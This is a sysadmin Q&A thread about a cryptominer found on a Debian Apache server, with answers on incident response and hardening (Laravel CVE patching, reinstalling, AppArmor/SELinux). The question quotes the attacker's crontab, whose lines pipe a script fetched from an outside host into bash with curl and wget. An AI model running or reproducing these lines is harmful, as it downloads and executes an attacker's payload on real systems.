# How to secure/harden apache2 on Debian?

Tags: debian, security, apache-httpd, malware

I recently found miner in my Debian 10 server by figuring out what was hogging whole resources (CPU and memory) with htop command. Apparently all malicious processes were running under www-data user. I killed those processes and emptied user www-data crontab. So far now it hasn't returned, but I think it will come back. Now I need help about securing/hardening apache2 as I think that miner was installed through apache2, because those processes were running under user www-data.

User www-data crontab had this content:

```
root@***:/var/www# cat /var/spool/cron/crontabs/www-data
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/tmp.eK8YZtGlIC/.sync.log installed on Mon Feb 15 23:27:41 2021)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
*/3 * * * * curl -sk "http://repo1.criticalnumeric.tech/init?time=1613424461" | bash && wget "http://repo1.criticalnumeric.tech/init?time=1613424461" -q -o /dev/null -O - | bash && busybox wget "http://repo1.criticalnumeric.tech/init?time=1613424461" -q -O - | bash
@reboot curl -sk "http://repo1.criticalnumeric.tech/init?time=1613424461" | bash && wget "http://repo1.criticalnumeric.tech/init?time=1613424461" -q -o /dev/null -O - | bash && busybox wget "http://repo1.criticalnumeric.tech/init?time=1613424461" -q -O - | bash
```

[image: miner processes running under www-data]

[image: miner processes running under www-data]

http://repo1.criticalnumeric.tech/scripts/cnc/install content: https://pastebin.com/Q049ZZtW

So what I did was:

```
touch /etc/cron.allow
```

and listed only "root" into this file, so non-root users would not be able to add any cron jobs.

But I don't think that's enough... How miner was able to add jobs into user www-data crontab?

So, I think that miner was able to write/execute malicious script in /var/www/site

/var/www is owned by root:root

But /var/www/site, /var/www/site2 etc is owned by www-data:www-data - so Laravel etc can work as web server is able to read/write/execute files/directories.

I noticed that:

> File permissions
>
> Web content
>
> For historical reasons, the Apache runs
> as a user named www-data. This is somewhat misleading since normally,
> the files in the ?DocumentRoot (/var/www) should not be owned or
> writable by that user. To find files with wrong permissions...

https://wiki.debian.org/Apache/Hardening

Do I understand correctly that /var/www/site, /var/www/site2 etc should not be owned by www-data:www-data?

What would be recommended way to secure/harden apache2?

When web files isn't owned by www-data:www-data then Laravel etc wouldn't be able to work as web server can't read/file/execute web files...

Comment: Since you mention Laravel, please check if your site is affected by [CVE-2021-3129](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-3129).

Comment: @Freddy thank you very much, one of my site does indeed have Laravel 7 which is affected by this vulnerability. So I'll have to update Laravel and remove any malicious code placed (if there's any) by an attacker.

Comment: You should reinstall from scratch or at least restore from a good known backup and update the system before it goes online. Don't try to quick-fix a compromised system. You can use a backup of the current system to find out how the attackers got into your system, but you can't trust it.

Answer (score 3):

There are no easy answers.

Your priority should be to find out what piece of software actually allowed this, because so far you haven't closed off the attacker's means of access, only prevented them from installing a crontab. You know it was most likely a web application, but you don't know which one.

When I am investigating such things I first try to correlate file modification times with suspicious web access log entries. Though note that a clever attacker can obscure their actions and change modification times of files, most don't bother.

Once you've worked out which web application was compromised, you need to find out how. Was it because there was a known security issue found and you didn't upgrade it in time, for example.

Finally, consider using some form of [mandatory access control](https://en.wikipedia.org/wiki/Mandatory_access_control) like [AppArmor](https://wiki.debian.org/AppArmor) or [SELinux](https://wiki.debian.org/SELinux) to restrict what the web server can do, which parts of the filesystem it can access, etc. If it can't write files anywhere except where it needs to or execute binaries that it doesn't normally need to execute then this can make it a lot harder for attackers and help protect you against previously unknown ("zero-day") exploits. There's also a lot that can be done in systemd unit files to restrict privileges of services.

Answer (score -1):

My guess (and it's just a guess) is that it was a random ssh attack. Bots often try to log into random IP addresses with common usernames and a dictionary of passwords.   I guess this because the process with the large overhead is `sshd` and a common username is `www-data`.

A couple of ways to fix this:

- Disallow `www-data` to login (it's usually a system user, so it's not usually necessary to give it a shell).
- Strengthen `www-data`'s password.
- Configure `sshd` to only accept keys instead of passwords and ensure `authorized_keys` is clean.

Comment: Login should be already secure (direct root login disabled, user login with ssh key). I just checked `/etc/passwd` and user www-data shell is set `/usr/sbin/nologin`. When I do `passwd --status www-data`, it says "L" which is a locked password.